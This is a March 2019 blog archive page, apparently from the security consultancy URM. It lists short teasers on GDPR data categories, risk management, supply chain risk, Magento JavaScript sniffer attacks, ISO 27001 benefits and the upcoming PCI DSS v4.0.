March 2019

  • GDPR – What’s the difference between personal data and sensitive personal data?

    There is some confusion about the difference between personal data and sensitive personal data and even whether sensitive personal data exists as a term!  So, let’s see if we can clarify the situation.  Under the old 1998 version of the Data Protection Act (DPA) 1998 there was a term ‘sensitive personal data’.  Under the GDPR […]

  • Tips from URM – Three tips to help you simplify your risk management process

    A key role of risk management is helping organisations decide how limited resources can be most effectively used to address the most pressing business issues, e.g. threats to information security.  Where current resources are insufficient, risk management can help management decide on what extra budget or resources (including seeking help from third-party specialists) are required.  […]

  • How should you approach supply chain risk management?

    In our blog on risk management challenges for 2019, we referred to the perennial risk attached to suppliers, as third parties continue to be a major source of incidents.  Linked to the Brexit issue, understanding the risks your suppliers face and the measures they are taking to mitigate those risks is vital.  In this blog, […]

  • Magento attacks – most recent and historic

    One trend we are seeing in the market at present is an increase in the use of JavaScript Sniffers (JS Sniffers).  In short, these sniffers are a type of malicious code which is injected/placed into a website with the sole intention of stealing personal data, names, credentials etc. from customers using that website.  Most recently, […]

  • Tips from URM – How can I demonstrate GDPR compliance?

    The easy way (if it was available!) would be to certify to an approved GDPR certification scheme.  The EU has stated that ‘Member states, supervisory authorities (such as the Information Commissioner’s Office in the UK), the European Data Protection Board (EDPB) and the Commission will promote certification as a means to enhance transparency and compliance […]

  • What are the ‘real world’ benefits of implementing ISO 27001?

    In a previous blog, we looked at ‘what is ISO27001 and why implement it’.  In this blog we want to dig a bit deeper on the benefits that are gained from implementing the standard and from achieving certification.  We could come up with a hypothetical list of benefits, but we thought it more beneficial to […]

  • Risk Management Challenges in 2019

    There has been a lot said and written about the risks businesses are expected to face in 2019, but less about challenges of risk management and the process itself.  Here are our thoughts on what we see as the key challenges : Legislation/regulation and the impact on your risk tolerance– In 2018, we saw a […]

  • Tips from URM – Impact of Legislation/Regulation on your approach to risk

    Last year, we saw a significant advance in legislation/regulation surrounding data privacy and protection, (e.g. the GDPR and DPA 18) and cyber security, (e.g. the EU Network and Information Systems (NIS) directive). The new legislation will, undoubtedly, have an impact on your risk tolerance and balancing your ‘position’ against the impact of such legislation/regulation will […]

  • PCI DSS V4.0 is on its way

    So,  PCI DSS v4.0 has started its development journey and is expected to be released sometime late 2020.  The actual release date will largely depend on the feedback received during the development review process. So what is the development process?  From 6 September to 15 November 2017 (yes 2017!!!), the PCI Security Standards Council offered […]